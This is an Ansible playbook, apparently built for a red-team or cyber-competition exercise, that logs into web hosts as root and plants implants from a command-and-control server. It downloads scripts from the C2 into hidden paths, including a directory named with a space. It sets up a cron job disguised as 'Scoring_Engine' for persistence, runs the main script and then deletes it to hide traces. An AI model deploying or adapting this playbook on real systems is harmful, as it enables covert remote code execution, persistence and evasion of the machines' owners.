---
- hosts: www 
  remote_user: root

  vars:
      c2_deploy: http://{{ C2 }}/deploy
      c2_deploy_ez: http://{{ C2 }}/deploy_ez
      working_dir: "/var/tmp/ /"
      ez_dir: /tmp

  tasks:
      #- name: Trying to install git. 
      #  package: name=git 

      - file: 'path={{ working_dir }}' state=directory mode=0755
      - file: 'path={{ ez_dir }}' state=directory mode=0755

      # Download better hidden script
      - name: Download deploy script
        get_url: url={{ c2_deploy }} 'dest={{ working_dir }}/.dad.sh' mode=0755

      # Download easy script for cron
      - name: Download ez script (cron script)
        get_url: url={{ c2_deploy_ez }} dest={{ ez_dir }}/.ez.sh mode=0755

      # Schedule execution of a script.
      - name: Scheduling tasks with cron.
        cron: name="Scoring_Engine" minute="5" hour="1" job="{{ ez_dir }}/.ez.sh"

      # Shell does not expect anything to be returned to the user.
      - name: Running bash script the first time.
        shell: {{ working_dir }}/.dad.sh

      # Remove deploy script
      - name: Remove deploy script.
        shell: rm -f {{ working_dir }}/.dad.sh
